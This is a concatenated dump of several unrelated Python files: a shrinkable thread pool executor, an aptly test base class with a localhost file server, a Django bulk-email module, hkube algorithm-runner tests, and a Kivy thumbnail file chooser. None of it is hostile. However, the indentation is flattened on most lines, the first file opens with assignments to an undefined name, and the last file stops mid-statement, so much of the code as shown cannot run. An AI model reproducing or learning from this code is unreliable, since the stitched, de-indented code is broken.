ThreadPoolExecutorShrinkAble.MIN_WORKERS = min_works
ThreadPoolExecutorShrinkAble.KEEP_ALIVE_TIME = keep_alive_time
class ThreadPoolExecutorShrinkAble(Executor, LoggerMixin, LoggerLevelSetterMixin):
    # To remain a perfect duck type of the official ThreadPoolExecutor, these two values are fixed class attributes rather than constructor arguments, so users cannot pass them in.
    # It is recommended to change them via a monkey patch (or set_threadpool_executor_shrinkable) so the constructor API stays identical to the built-in concurrent.futures one.
    # MIN_WORKERS = 5  # can be set to 0; the minimum number of threads kept on standby no matter how long the pool has had no tasks.
    # KEEP_ALIVE_TIME = 60
MIN_WORKERS = 1
KEEP_ALIVE_TIME = 10
def __init__(self, max_workers=None, thread_name_prefix=''):
"""
最好需要兼容官方concurren.futures.ThreadPoolExecutor 和改版的BoundedThreadPoolExecutor,入参名字和个数保持了一致。
:param max_workers:
:param thread_name_prefix:
"""
self._max_workers = max_workers or 4
self._thread_name_prefix = thread_name_prefix
        self.work_queue = self._work_queue = queue.Queue(self._max_workers)
# self._threads = set()
self._threads = weakref.WeakSet()
self._lock_compute_threads_free_count = threading.Lock()
self.threads_free_count = 0
self._shutdown = False
self._shutdown_lock = threading.Lock()
self.pool_ident = id(self)
def _change_threads_free_count(self, change_num):
with self._lock_compute_threads_free_count:
self.threads_free_count += change_num
def submit(self, func, *args, **kwargs):
with self._shutdown_lock:
if self._shutdown:
                raise RuntimeError('Cannot submit new tasks to a thread pool that has been shut down')
f = Future()
w = _WorkItem(f, func, args, kwargs)
self.work_queue.put(w)
self._adjust_thread_count()
return f
def _adjust_thread_count(self):
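        # Start a new worker only when there are not enough idle threads and the pool is below max_workers; this is what keeps thread creation frugal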
# print(self.threads_free_count, self.MIN_WORKERS, len(self._threads), self._max_workers)
if self.threads_free_count <= self.MIN_WORKERS and len(self._threads) < self._max_workers:
t = _CustomThread(self).set_log_level(self.logger.level)
t.daemon = True
t.start()
self._threads.add(t)
_threads_queues[t] = self._work_queue
def shutdown(self, wait=True): # noqa
with self._shutdown_lock:
self._shutdown = True
self.work_queue.put(None)
if wait:
for t in self._threads:
t.join()
# Both names are accepted: the old name (meaning "custom thread pool") is kept for backwards compatibility, but the new name better expresses what it does (a shrinkable thread pool).
CustomThreadpoolExecutor = CustomThreadPoolExecutor = ThreadPoolExecutorShrinkAble
# noinspection PyProtectedMember
class _CustomThread(threading.Thread, LoggerMixin, LoggerLevelSetterMixin):
_lock_for_judge_threads_free_count = threading.Lock()
def __init__(self, executorx: ThreadPoolExecutorShrinkAble):
super().__init__()
self._executorx = executorx
def _remove_thread(self, stop_resson=''):
# noinspection PyUnresolvedReferences
        self.logger.debug(f'Stopping thread {self._ident}, trigger: {stop_resson} ')
self._executorx._change_threads_free_count(-1)
self._executorx._threads.remove(self)
_threads_queues.pop(self)
# noinspection PyProtectedMember
def run(self):
# noinspection PyUnresolvedReferences
        self.logger.debug(f'Started new thread {self._ident} ')
self._executorx._change_threads_free_count(1)
while True:
try:
work_item = self._executorx.work_queue.get(block=True, timeout=self._executorx.KEEP_ALIVE_TIME)
except queue.Empty:
                # continue
                # self._remove_thread()
                with self._lock_for_judge_threads_free_count:
                    if self._executorx.threads_free_count > self._executorx.MIN_WORKERS:
                        self._remove_thread(
                            f'thread {self.ident} in pool {self._executorx.pool_ident} had no task for more than {self._executorx.KEEP_ALIVE_TIME} seconds; the number of idle threads in the pool is '
                            f'{self._executorx.threads_free_count}, which exceeds the configured minimum of {self._executorx.MIN_WORKERS}')
                        break  # Leaving the while loop is what actually ends the thread; _remove_thread only does the bookkeeping, it does not destroy the thread itself.
                    else:
                        continue
if work_item is not None:
self._executorx._change_threads_free_count(-1)
work_item.run()
del work_item
self._executorx._change_threads_free_count(1)
continue
if _shutdown or self._executorx._shutdown:
self._executorx.work_queue.put(None)
break
process_name_set = set()
logger_show_current_threads_num = LogManager('show_current_threads_num').get_logger_and_add_handlers(
formatter_template=5, log_filename='show_current_threads_num.log', do_not_use_color_handler=False)
def show_current_threads_num(sleep_time=600, process_name='', block=False, daemon=True):
process_name = sys.argv[0] if process_name == '' else process_name
def _show_current_threads_num():
while True:
            # logger_show_current_threads_num.info(f'{process_name} process concurrency --> {threading.active_count()}')
            # nb_print(f' {process_name} {os.getpid()} process thread count --> {threading.active_count()}')
            logger_show_current_threads_num.info(
                f' {process_name} {os.getpid()} process thread count --> {threading.active_count()}')
time.sleep(sleep_time)
if process_name not in process_name_set:
if block:
_show_current_threads_num()
else:
t = threading.Thread(target=_show_current_threads_num, daemon=daemon)
t.start()
process_name_set.add(process_name)
def get_current_threads_num():
return threading.active_count()
if __name__ == '__main__':
show_current_threads_num(sleep_time=5)
def f1(a):
        time.sleep(0.2)  # Change this number to test the automatic thread-count adjustment.
        nb_print(f'{a} .......')
        return a * 10
        # raise Exception('test error')  # The official pool would not show this error, leaving you to believe your code is fine.
    pool = ThreadPoolExecutorShrinkAble(200)
    # pool = ThreadPoolExecutor(200)  # for comparison with the built-in pool
    for i in range(30):
        time.sleep(0.05)  # This interval simulates sparse task arrival: f1 is quick, so only a few threads are needed
        # and there is no reason to start that many threads -- one advantage of CustomThreadPoolExecutor over ThreadPoolExecutor.
        futurex = pool.submit(f1, i)
        # print(futurex.result())
    # 1. The sleep below blocks the main thread from exiting; comment it out to test main-thread exit behaviour.
    # 2. It also shows that after a long stretch with no tasks the official pool keeps its maximum thread count,
    #    while this pool shrinks automatically, implementing the keepAliveTime behaviour of Java thread pools.
    time.sleep(1000000)
|
lib.py
|
"""
Test library.
"""
import difflib
import inspect
import json
import subprocess
import os
import posixpath
import shlex
import shutil
import string
import threading
import urllib
import pprint
import SocketServer
import SimpleHTTPServer
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
pass
class FileHTTPServerRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def translate_path(self, path):
"""Translate a /-separated PATH to the local filename syntax.
Components that mean special things to the local file system
(e.g. drive or directory names) are ignored. (XXX They should
probably be diagnosed.)
"""
# abandon query parameters
path = path.split('?', 1)[0]
path = path.split('#', 1)[0]
path = posixpath.normpath(urllib.unquote(path))
words = path.split('/')
words = filter(None, words)
path = self.rootPath
for word in words:
drive, word = os.path.splitdrive(word)
head, word = os.path.split(word)
if word in (os.curdir, os.pardir):
continue
path = os.path.join(path, word)
return path
def log_message(self, format, *args):
pass
class BaseTest(object):
"""
Base class for all tests.
"""
longTest = False
fixturePool = False
fixturePoolCopy = False
fixtureDB = False
fixtureGpg = False
fixtureWebServer = False
expectedCode = 0
configFile = {
"rootDir": "%s/.aptly" % os.environ["HOME"],
"downloadConcurrency": 4,
"downloadSpeedLimit": 0,
"architectures": [],
"dependencyFollowSuggests": False,
"dependencyFollowRecommends": False,
"dependencyFollowAllVariants": False,
"dependencyFollowSource": False,
"gpgDisableVerify": False,
"gpgDisableSign": False,
"ppaDistributorID": "ubuntu",
"ppaCodename": "",
}
configOverride = {}
environmentOverride = {}
fixtureDBDir = os.path.join(os.environ["HOME"], "aptly-fixture-db")
fixturePoolDir = os.path.join(os.environ["HOME"], "aptly-fixture-pool")
fixtureGpgKeys = ["debian-archive-keyring.gpg",
"launchpad.key",
"flat.key",
"pagerduty.key",
"nvidia.key",
"jenkins.key"]
outputMatchPrepare = None
captureResults = False
def test(self):
self.prepare()
self.run()
self.check()
def prepare_remove_all(self):
if os.path.exists(os.path.join(os.environ["HOME"], ".aptly")):
shutil.rmtree(os.path.join(os.environ["HOME"], ".aptly"))
if os.path.exists(os.path.join(os.environ["HOME"], ".aptly.conf")):
os.remove(os.path.join(os.environ["HOME"], ".aptly.conf"))
if os.path.exists(os.path.join(os.environ["HOME"], ".gnupg", "aptlytest.gpg")):
os.remove(os.path.join(os.environ["HOME"], ".gnupg", "aptlytest.gpg"))
def prepare_default_config(self):
cfg = self.configFile.copy()
cfg.update(**self.configOverride)
f = open(os.path.join(os.environ["HOME"], ".aptly.conf"), "w")
f.write(json.dumps(cfg))
f.close()
def fixture_available(self):
if self.fixturePool and not os.path.exists(self.fixturePoolDir):
return False
if self.fixtureDB and not os.path.exists(self.fixtureDBDir):
return False
return True
def prepare_fixture(self):
if self.fixturePool:
os.makedirs(os.path.join(os.environ["HOME"], ".aptly"), 0755)
os.symlink(self.fixturePoolDir, os.path.join(os.environ["HOME"], ".aptly", "pool"))
if self.fixturePoolCopy:
os.makedirs(os.path.join(os.environ["HOME"], ".aptly"), 0755)
shutil.copytree(self.fixturePoolDir, os.path.join(os.environ["HOME"], ".aptly", "pool"), ignore=shutil.ignore_patterns(".git"))
if self.fixtureDB:
shutil.copytree(self.fixtureDBDir, os.path.join(os.environ["HOME"], ".aptly", "db"))
if self.fixtureWebServer:
self.webServerUrl = self.start_webserver(os.path.join(os.path.dirname(inspect.getsourcefile(self.__class__)),
self.fixtureWebServer))
if self.fixtureGpg:
self.run_cmd(["gpg", "--no-default-keyring", "--trust-model", "always", "--batch", "--keyring", "aptlytest.gpg", "--import"] +
[os.path.join(os.path.dirname(inspect.getsourcefile(BaseTest)), "files", key) for key in self.fixtureGpgKeys])
if hasattr(self, "fixtureCmds"):
for cmd in self.fixtureCmds:
self.run_cmd(cmd)
def run(self):
self.output = self.output_processor(self.run_cmd(self.runCmd, self.expectedCode))
def _start_process(self, command, stderr=subprocess.STDOUT, stdout=None):
if not hasattr(command, "__iter__"):
params = {
'files': os.path.join(os.path.dirname(inspect.getsourcefile(BaseTest)), "files"),
'changes': os.path.join(os.path.dirname(inspect.getsourcefile(BaseTest)), "changes"),
'udebs': os.path.join(os.path.dirname(inspect.getsourcefile(BaseTest)), "udebs"),
'testfiles': os.path.join(os.path.dirname(inspect.getsourcefile(self.__class__)), self.__class__.__name__),
'aptlyroot': os.path.join(os.environ["HOME"], ".aptly"),
}
if self.fixtureWebServer:
params['url'] = self.webServerUrl
command = string.Template(command).substitute(params)
command = shlex.split(command)
environ = os.environ.copy()
environ["LC_ALL"] = "C"
environ.update(self.environmentOverride)
return subprocess.Popen(command, stderr=stderr, stdout=stdout, env=environ)
def run_cmd(self, command, expected_code=0):
try:
proc = self._start_process(command, stdout=subprocess.PIPE)
output, _ = proc.communicate()
if proc.returncode != expected_code:
raise Exception("exit code %d != %d (output: %s)" % (proc.returncode, expected_code, output))
return output
except Exception, e:
raise Exception("Running command %s failed: %s" % (command, str(e)))
def gold_processor(self, gold):
return gold
def output_processor(self, output):
return output
def expand_environ(self, gold):
return string.Template(gold).substitute(os.environ)
def get_gold_filename(self, gold_name="gold"):
return os.path.join(os.path.dirname(inspect.getsourcefile(self.__class__)), self.__class__.__name__ + "_" + gold_name)
def get_gold(self, gold_name="gold"):
return self.gold_processor(open(self.get_gold_filename(gold_name), "r").read())
def check_output(self):
try:
self.verify_match(self.get_gold(), self.output, match_prepare=self.outputMatchPrepare)
except: # noqa: E722
if self.captureResults:
if self.outputMatchPrepare is not None:
self.output = self.outputMatchPrepare(self.output)
with open(self.get_gold_filename(), "w") as f:
f.write(self.output)
else:
raise
def check_cmd_output(self, command, gold_name, match_prepare=None, expected_code=0):
output = self.run_cmd(command, expected_code=expected_code)
try:
self.verify_match(self.get_gold(gold_name), output, match_prepare)
except: # noqa: E722
if self.captureResults:
if match_prepare is not None:
output = match_prepare(output)
with open(self.get_gold_filename(gold_name), "w") as f:
f.write(output)
else:
raise
def read_file(self, path):
with open(os.path.join(os.environ["HOME"], ".aptly", path), "r") as f:
return f.read()
def delete_file(self, path):
os.unlink(os.path.join(os.environ["HOME"], ".aptly", path))
def check_file_contents(self, path, gold_name, match_prepare=None):
contents = self.read_file(path)
try:
self.verify_match(self.get_gold(gold_name), contents, match_prepare=match_prepare)
except: # noqa: E722
if self.captureResults:
if match_prepare is not None:
contents = match_prepare(contents)
with open(self.get_gold_filename(gold_name), "w") as f:
f.write(contents)
else:
raise
def check_file(self):
contents = open(self.checkedFile, "r").read()
try:
self.verify_match(self.get_gold(), contents)
except: # noqa: E722
if self.captureResults:
with open(self.get_gold_filename(), "w") as f:
f.write(contents)
else:
raise
def check_exists(self, path):
if not os.path.exists(os.path.join(os.environ["HOME"], ".aptly", path)):
raise Exception("path %s doesn't exist" % (path, ))
def check_not_exists(self, path):
if os.path.exists(os.path.join(os.environ["HOME"], ".aptly", path)):
raise Exception("path %s exists" % (path, ))
def check_file_not_empty(self, path):
if os.stat(os.path.join(os.environ["HOME"], ".aptly", path))[6] == 0:
raise Exception("file %s is empty" % (path, ))
def check_equal(self, a, b):
if a != b:
self.verify_match(a, b, match_prepare=pprint.pformat)
def check_ge(self, a, b):
if not a >= b:
raise Exception("%s is not greater or equal to %s" % (a, b))
def check_gt(self, a, b):
if not a > b:
raise Exception("%s is not greater to %s" % (a, b))
def check_in(self, item, l):
if item not in l:
raise Exception("item %r not in %r", item, l)
def check_subset(self, a, b):
diff = ''
for k, v in a.items():
if k not in b:
diff += "unexpected key '%s'\n" % (k,)
elif b[k] != v:
diff += "wrong value '%s' for key '%s', expected '%s'\n" % (v, k, b[k])
if diff:
raise Exception("content doesn't match:\n" + diff)
def verify_match(self, a, b, match_prepare=None):
if match_prepare is not None:
a = match_prepare(a)
b = match_prepare(b)
if a != b:
diff = "".join(difflib.unified_diff([l + "\n" for l in a.split("\n")], [l + "\n" for l in b.split("\n")]))
raise Exception("content doesn't match:\n" + diff + "\n")
check = check_output
def prepare(self):
self.prepare_remove_all()
self.prepare_default_config()
self.prepare_fixture()
def start_webserver(self, directory):
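        """Serve the given directory over HTTP on a random localhost port in a daemon thread and return the base URL."""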
FileHTTPServerRequestHandler.rootPath = directory
self.webserver = ThreadedTCPServer(("localhost", 0), FileHTTPServerRequestHandler)
server_thread = threading.Thread(target=self.webserver.serve_forever)
server_thread.daemon = True
server_thread.start()
return "http://%s:%d/" % self.webserver.server_address
def shutdown(self):
if hasattr(self, 'webserver'):
self.shutdown_webserver()
def shutdown_webserver(self):
self.webserver.shutdown()
@classmethod
def shutdown_class(cls):
pass
|
emails.py
|
"""
Email module
"""
# Threading
import threading
from django.core.mail import message
# Email
from ....settings.base import EMAIL_HOST_USER
from django.core.mail.message import (
EmailMultiAlternatives,
)
from django.utils.module_loading import import_string
# Templates
from django.core.mail import send_mail, send_mass_mail
from django.template.loader import get_template
# Settings
from ....settings import base as settings
# Site
from django.contrib.sites.models import Site
SINGLE_EMAIL_LIMIT = 2
# Message generation
def generateInscriptionAlertMessage(name, activity, inscription):
context = {
'name': name,
'activity_title': activity.title,
'activity': activity,
'inscription': inscription,
'domain': Site.objects.get_current().domain,
}
template = get_template('emails/inscriptionAlert.html')
content = template.render(context)
return content
def generateBroadcastMessage(broadcast):
context = {
'broadcast': broadcast,
'domain': Site.objects.get_current().domain,
}
template = get_template('emails/broadcast.html')
content = template.render(context)
return content
def generateStatusReportMessage(messages_dict):
context = {
'messages': messages_dict,
}
template = get_template('emails/statusreport.html')
content = template.render(context)
return content
# Backend
def generateDatatuple(recipient_list, subject, message):
    # for sending massive emails
    # format: subject, message, sender, recipient list
    datatuple = (subject, message, settings.EMAIL_HOST_USER, recipient_list)
    return datatuple
def get_connection(backend=None, fail_silently=False, **kwds):
"""Load an email backend and return an instance of it.
If backend is None (default) settings.EMAIL_BACKEND is used.
Both fail_silently and other keyword arguments are used in the
constructor of the backend.
"""
klass = import_string(backend or settings.EMAIL_BACKEND)
return klass(fail_silently=fail_silently, **kwds)
def sendMassiveHtmlEmails(datatuple, fail_silently=False, auth_user=None,
auth_password=None, connection=None):
"""
    Given a datatuple of (subject, html_message, from_email, recipient_list),
    send the HTML message to all recipients in BCC batches of 100.
    Return the number of messages handed to the email connection.
If auth_user and auth_password are set, use them to log in.
If auth_user is None, use the EMAIL_HOST_USER setting.
If auth_password is None, use the EMAIL_HOST_PASSWORD setting.
"""
connection = connection or get_connection(
username=auth_user,
password=auth_password,
fail_silently=fail_silently,
)
plain_text_message = ''
messages = []
step = 100
email_list_length = len(datatuple[3])
for j in range(0, email_list_length, step):
        # slicing already clamps at the end of the list, so a single slice is enough
        bcc_recipients = datatuple[3][j:j + step]
        message = EmailMultiAlternatives(datatuple[0], plain_text_message, datatuple[2],
                                         alternatives=[(datatuple[1], 'text/html')],
                                         connection=connection,
                                         bcc=bcc_recipients)
messages.append(message)
    return connection.send_messages(messages)
def sendMassiveEmails(addressee_list, subject, message): # Do not use this function directly
    data = (subject, message, EMAIL_HOST_USER, addressee_list)
    # send_mass_mail((data,), fail_silently=False) is not used here because it
    # only supports plain-text bodies; send one HTML email per recipient instead.
for email in addressee_list:
send_mail(
data[0],
data[1],
data[2],
[email],
fail_silently=False,
html_message=message
)
return True
def startSendEmails(addressee_list, message, subject='Información Gepian'):
print('---- Threads before sending:', threading.active_count())
if len(addressee_list) > SINGLE_EMAIL_LIMIT:
datatuple = generateDatatuple(addressee_list, subject, message)
email_thread = threading.Thread(target=sendMassiveHtmlEmails, args=(datatuple,))
else:
email_thread = threading.Thread(target=sendMassiveEmails, args=(addressee_list, subject, message))
email_thread.start()
#email_thread.join()
# sendMassiveEmails(addressee_list, message)
print('---- Sending {0} emails...'.format(len(addressee_list)))
return True
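# A hedged usage sketch (not part of the original module; the user, activity
# and inscription objects are assumed to exist elsewhere in the project):
#
#   html = generateInscriptionAlertMessage(user.first_name, activity, inscription)
#   startSendEmails(['someone@example.com'], html, subject='Inscription alert')
#
# startSendEmails spawns a background thread; with more than SINGLE_EMAIL_LIMIT
# recipients it takes the BCC-batched sendMassiveHtmlEmails path, otherwise it
# falls back to one send_mail call per recipient in sendMassiveEmails.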
|
test_wrapper.py
|
import os
import time
import pytest
# from mock import patch
from time import sleep
from threading import Thread
from hkube_python_wrapper.communication.streaming.StreamingManager import StreamingManager
from hkube_python_wrapper import Algorunner
from tests.configs import config
from tests.mocks import mockdata
from hkube_python_wrapper.codeApi.hkube_api import HKubeApi
oneMB = 1024 * 1024
class Algorithm(object):
pass
def startCallbackBytes(args):
return bytearray(b'\xdd' * (1 * oneMB))
def startCallback(args):
return args["input"]["input"][0]
def test_load_algorithm_callbacks():
algorunner = Algorunner()
algorunner.loadAlgorithmCallbacks(startCallback, options=config)
result1 = algorunner._originalAlgorithm['start']({'input': mockdata.initData}, None)
result2 = startCallback({'input': mockdata.initData})
assert result1 == result2
algorunner.close()
def test_load_algorithm_streaming_then_batch():
algorunner = Algorunner()
algorunner.loadAlgorithmCallbacks(startCallback, options=config)
algorunner.streamingManager = StreamingManager()
algorunner._hkubeApi = HKubeApi(None, algorunner, None, None,algorunner.streamingManager)
algorunner._init(mockdata.streamingInitData)
thrd = Thread(target=algorunner._originalAlgorithm['start'], args=[{'input': mockdata.streamingInitData}, algorunner._hkubeApi])
thrd.start()
algorunner._stopAlgorithm(mockdata.initData)
result1 = algorunner._originalAlgorithm['start']({'input': mockdata.initData}, algorunner._hkubeApi)
result2 = startCallback({'input': mockdata.initData})
assert result1 == result2
algorunner.close()
def xtest_exit():
with patch('sys.exit') as exit_mock:
def doExit(a):
status['exit'] = True
def invokeExit():
algorunner._exit(None)
def isServingTrue():
return True
def isServingFalse():
return False
algorunner = Algorunner()
algorunner.loadAlgorithmCallbacks(startCallback)
algorunner.connectToWorker(config)
sleep(1)
status = {'exit': False}
algorunner.loadAlgorithmCallbacks(startCallback, exit=doExit)
algorunner._dataServer.isServing = isServingTrue
Thread(target=invokeExit).start()
sleep(1)
assert status['exit'] == False
algorunner._dataServer.isServing = isServingFalse
sleep(1)
assert status['exit'] == True
assert exit_mock.called
def test_failed_load_algorithm():
alg = Algorithm()
alg.algorithm = {
"path": "no_such_path",
"entryPoint": "main.py"
}
algorunner = Algorunner()
algorunner.loadAlgorithm(alg)
assert "No module named" in algorunner._loadAlgorithmError
assert "no_such_path" in algorunner._loadAlgorithmError
algorunner.close()
def xtest_load_algorithm():
alg = Algorithm()
alg.algorithm = {
"path": "test_alg",
"entryPoint": "main.py"
}
cwd = os.getcwd()
os.chdir(cwd + '/tests')
algorunner = Algorunner()
algorunner.loadAlgorithm(alg)
# os.chdir(cwd)
result1 = algorunner._originalAlgorithm['start']({'input': mockdata.initData}, None)
result2 = startCallback({'input': mockdata.initData})
assert result1 == result2
@pytest.mark.parametrize("test_input,expected", [
('main.py','main'),
('main','main'),
('foo.bar.main.py','foo.bar.main'),
('foo.bar.main','foo.bar.main'),
('foo/bar/main.py','foo.bar.main'),
('foo/bar/main','foo.bar.main'),
])
def test_entryPoint(test_input,expected):
actual = Algorunner._getEntryPoint(test_input)
assert actual == expected
def startCallback2(args):
return args["input"][0]
def test_connect_to_worker():
config.discovery.update({"port": "9021"})
algorunner = Algorunner()
algorunner.loadAlgorithmCallbacks(startCallback2, options=config)
algorunner.connectToWorker(config)
time.sleep(2)
assert algorunner._connected == True
assert algorunner._input == mockdata.initData
algorunner.close()
|
__init__.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""StudioFileChooserThumbView
====================
The StudioFileChooserThumbView widget is similar to FileChooserIconView,
but if possible it shows a thumbnail instead of a normal icon.
Usage
-----
You can set some properties in order to control its performance:
* **showthumbs:** Thumbnail limit. If set to a number > 0, it will show the
thumbnails only if the directory doesn't contain more files or directories.
If set to 0 it won't show any thumbnail. If set to a number < 0 it will always
show the thumbnails, regardless of how many items the current directory
contains. By default it is set to -1, so it will show all the thumbnails.
* **thumbdir:** Custom directory for the thumbnails. By default it uses
tempfile to generate it randomly.
* **thumbsize:** The size of the thumbnails. It defaults to 64dp.
"""
# Thanks to allan-simon for making the code more readable and less "spaghetti" :)
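# A minimal usage sketch (illustration only; it assumes a running Kivy app and
# the property values shown are arbitrary):
#
#   chooser = StudioFileChooserThumbView(showthumbs=200, thumbsize=dp(96))
#   chooser.bind(on_file_select=lambda widget, path: print(path))
#
# With showthumbs=200, directories holding more than 200 entries fall back to
# plain icons instead of generated thumbnails.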
import os
from os.path import abspath, dirname
import mimetypes
#(enable for debugging)
import traceback
import shutil
import subprocess
from threading import Thread
from os.path import join, exists, dirname
from tempfile import mktemp, mkdtemp
from kivy.app import App
from kivy.lang import Builder
from kivy.metrics import dp
from kivy.utils import QueryDict
from kivy.properties import StringProperty
from kivy.properties import DictProperty
from kivy.properties import ObjectProperty
from kivy.properties import BooleanProperty
from kivy.properties import NumericProperty
from kivy.uix.filechooser import FileChooserController
from kivy.uix.behaviors import FocusBehavior
from kivy.uix.stacklayout import StackLayout
from kivy.uix.gridlayout import GridLayout
from kivystudio.behaviors import HighlightBehavior
# directory with this package
_path = os.path.dirname(os.path.realpath(__file__))
Builder.load_string("""
#: import Clock kivy.clock.Clock
<StudioFileChooserThumbView>:
stacklayout: stacklayout
on_entry_added: stacklayout.add_widget(args[1])
on_entries_cleared: stacklayout.clear_widgets()
scrollview: scrollview
ScrollView:
id: scrollview
FileStack_:
id: stacklayout
filechooser: root
width: scrollview.width
size_hint_y: None
height: self.minimum_height
spacing: '10dp'
padding: '10dp'
highlighted_shape: 'rounded_rectangle'
highlight_orientation: 'grid'
auto_scroll_to: True
on_size: Clock.schedule_once(lambda dt: setattr(self, 'grid_len', int(self.width/(self.children[0].width+10))), 1)
[StudioFileThumbEntry@IconWidget_]:
image: image
locked: False
path: ctx.path
selected: self.path in ctx.controller().selection
size_hint: None, None
cols: 1
size: ctx.controller().thumbsize + dp(52), self.minimum_height
on_double_tap: ctx.controller().entry_released(self, args[1])
canvas:
Color:
rgba: 1, 1, 1, 1 if self.selected else 0
BorderImage:
border: 8, 8, 8, 8
pos: root.pos
size: root.size
source: 'atlas://data/images/defaulttheme/filechooser_selected'
AsyncImage:
id: image
size_hint: 1, None
size: ctx.controller().thumbsize, ctx.controller().thumbsize
# pos: root.x + dp(24), root.y + dp(40)
Label:
size_hint: 1, None
text: ctx.name
text_size: (ctx.controller().thumbsize + dp(20), None)
halign: 'center'
size: ctx.controller().thumbsize + dp(10), self.texture_size[1]
color: 0,0,0,1
valign: 'top'
shorten_from: 'right'
<IconWidget_>:
""")
DEFAULT_THEME = 'atlas://data/images/defaulttheme/'
FILE_ICON = DEFAULT_THEME + 'filechooser_file'
FOLDER_ICON = DEFAULT_THEME + 'filechooser_folder'
UNKWON_ICON=DEFAULT_THEME + 'filechooser_file'
ICON_PATH = dirname(dirname(__file__)) + '/file_formats/'
MP3_ICON = ICON_PATH + 'music.png'
VIDEO_ICON = ICON_PATH + 'video.png'
PYTHON_ICON = ICON_PATH + 'python.png'
KV_ICON = ICON_PATH + 'kv.png'
JAVA_ICON = ICON_PATH + 'java.png'
PDF_ICON = ICON_PATH + 'pdf.png'
ARCHIVE_ICON = ICON_PATH + 'archive.png'
# UNKWON_ICON = '.png'
ARCHIVES_MIME = ('application/zip', 'application/x-tar',)
APK_MIME = 'application/vnd.android.package-archive'
EXE_MIME = 'application/x-msdos-program'
PDF_MIME = 'application/pdf'
##############################
FLAC_MIME = "audio/flac"
MP3_MIME = "audio/mpeg"
PYTHON_MIME = "text/x-python"
JAVA_MIME = "text/x-java"
AVCONV_BIN = 'avconv'
FFMPEG_BIN = 'ffmpeg'
CONVERT_BIN = 'convert'
class IconWidget_(GridLayout):
'Internal widget used to display files'
def __init__(self, **kwargs):
super(IconWidget_, self).__init__(**kwargs)
self.register_event_type('on_double_tap')
def on_touch_down(self, touch):
if self.collide_point(*touch.pos):
if touch.is_double_tap:
self.dispatch('on_double_tap', touch)
return True
else:
self.parent.set_highlighted(self)
return True
return super(IconWidget_, self).on_touch_down(touch)
def on_double_tap(self, touch):
if os.path.isfile(self.path):
self.parent.parent.parent.dispatch('on_file_select', self.path)
class FileStack_(HighlightBehavior, FocusBehavior, StackLayout):
    # overriding enter from HighlightBehavior
def do_enter(self):
new_path = self.current_highlighted_child.path
if os.path.isdir(new_path):
if new_path=='../': # move back
new_path = os.path.dirname(self.filechooser.path)
self.filechooser.path = new_path
elif os.path.isfile(new_path):
self.filechooser.dispatch('on_file_select', new_path)
class StudioFileChooserThumbView(FileChooserController):
'''Implementation of :class:`FileChooserController` using an icon view
with thumbnails.
'''
_ENTRY_TEMPLATE = 'StudioFileThumbEntry'
thumbdir = StringProperty(mkdtemp(prefix="kivy-", suffix="-thumbs"))
'''Custom directory for the thumbnails. By default it uses tempfile to
generate it randomly.
'''
showthumbs = NumericProperty(-1)
'''Thumbnail limit. If set to a number > 0, it will show the thumbnails
only if the directory doesn't contain more files or directories. If set
to 0 it won't show any thumbnail. If set to a number < 0 it will always
show the thumbnails, regardless of how many items the current directory
contains.
By default it is set to -1, so it will show all the thumbnails.
'''
thumbsize = NumericProperty(dp(64))
"""The size of the thumbnails. It defaults to 64dp.
"""
    play_overlay = StringProperty(os.path.join(_path, 'play_overlay.png'))
    """Path to an image file (e.g. png) that will be overlaid on video
    thumbnails (e.g. a "play" button). If it's an empty string nothing
    will happen.
    Defaults to the 'play_overlay.png' file shipped next to this module.
    """
stacklayout = ObjectProperty(None)
filmstrip_left = StringProperty("")
filmstrip_right = StringProperty("")
_thumbs = DictProperty({})
scrollview = ObjectProperty(None)
def __init__(self, **kwargs):
super(StudioFileChooserThumbView, self).__init__(**kwargs)
self.register_event_type('on_file_select')
self.thumbnail_generator = ThreadedThumbnailGenerator()
if not exists(self.thumbdir):
os.mkdir(self.thumbdir)
def clear_cache(self, *args):
try:
shutil.rmtree(self.thumbdir, ignore_errors=True)
except:
traceback.print_exc()
def _dir_has_too_much_files(self, path):
if (self.showthumbs < 0):
return False
nbrFileInDir = len(
os.listdir(dirname(path))
)
return nbrFileInDir > self.showthumbs
def _create_entry_widget(self, ctx):
# instantiate the widget
widget = super(StudioFileChooserThumbView, self)._create_entry_widget(ctx)
kctx = QueryDict(ctx)
# default icon
widget.image.source = FOLDER_ICON if kctx.isdir else UNKWON_ICON
# schedule generation for later execution
self.thumbnail_generator.append(widget.image, kctx, self._get_image)
self.thumbnail_generator.run()
return widget
def _get_image(self, ctx):
try:
App.get_running_app().bind(on_stop=self.clear_cache)
except AttributeError:
pass
except:
traceback.print_exc()
if ctx.isdir:
return FOLDER_ICON
# if the directory contains more files
        # than the configured showthumbs limit,
# we directly return a default file icon
if self._dir_has_too_much_files(ctx.path):
return FILE_ICON
try:
mime = get_mime(ctx.name)
# if we already have generated the thumb
# for this file, we get it directly from our
# cache
if ctx.path in self._thumbs.keys():
return self._thumbs[ctx.path]
# if it's a picture, we don't need to do
            # any transformation
if is_picture(mime, ctx.name):
return ctx.path
# for mp3/flac an image can be embedded
# into the file, so we try to get it
if mime == MP3_MIME:
return self._generate_image_from_mp3(
ctx.path
)
if mime == FLAC_MIME:
return self._generate_image_from_flac(
ctx.path
)
if mime == PYTHON_MIME:
return PYTHON_ICON
if mime == JAVA_MIME:
return JAVA_ICON
if mime in ARCHIVES_MIME:
return ARCHIVE_ICON
if mime == PDF_MIME:
return PDF_ICON
# if it's a video we will extract a frame out of it
if "video/" in mime:
return self._generate_image_from_video(ctx.path)
            extension = os.path.splitext(ctx.name)[1]
            if extension == '.kv':
return KV_ICON
except:
traceback.print_exc()
return FILE_ICON
return FILE_ICON
def _generate_image_from_flac(self, flacPath):
# if we don't have the python module to
# extract image from flac, we just return
# default file's icon
try:
from mutagen.flac import FLAC
except ImportError:
return FILE_ICON
try:
audio = FLAC(flacPath)
art = audio.pictures
return self._generate_image_from_art(
art,
flacPath
)
except(IndexError, TypeError):
return FILE_ICON
def _generate_image_from_mp3(self, mp3Path):
# if we don't have the python module to
# extract image from mp3, we just return
# default file's icon
try:
from mutagen.id3 import ID3
except ImportError:
return MP3_ICON
try:
audio = ID3(mp3Path)
art = audio.getall("APIC")
return self._generate_image_from_art(
art,
mp3Path
)
except(IndexError, TypeError):
return MP3_ICON
def _generate_image_from_art(self, art, path):
pix = pix_from_art(art)
ext = mimetypes.guess_extension(pix.mime)
        # guess_extension() returns the extension with a leading dot
        if ext == '.jpe':
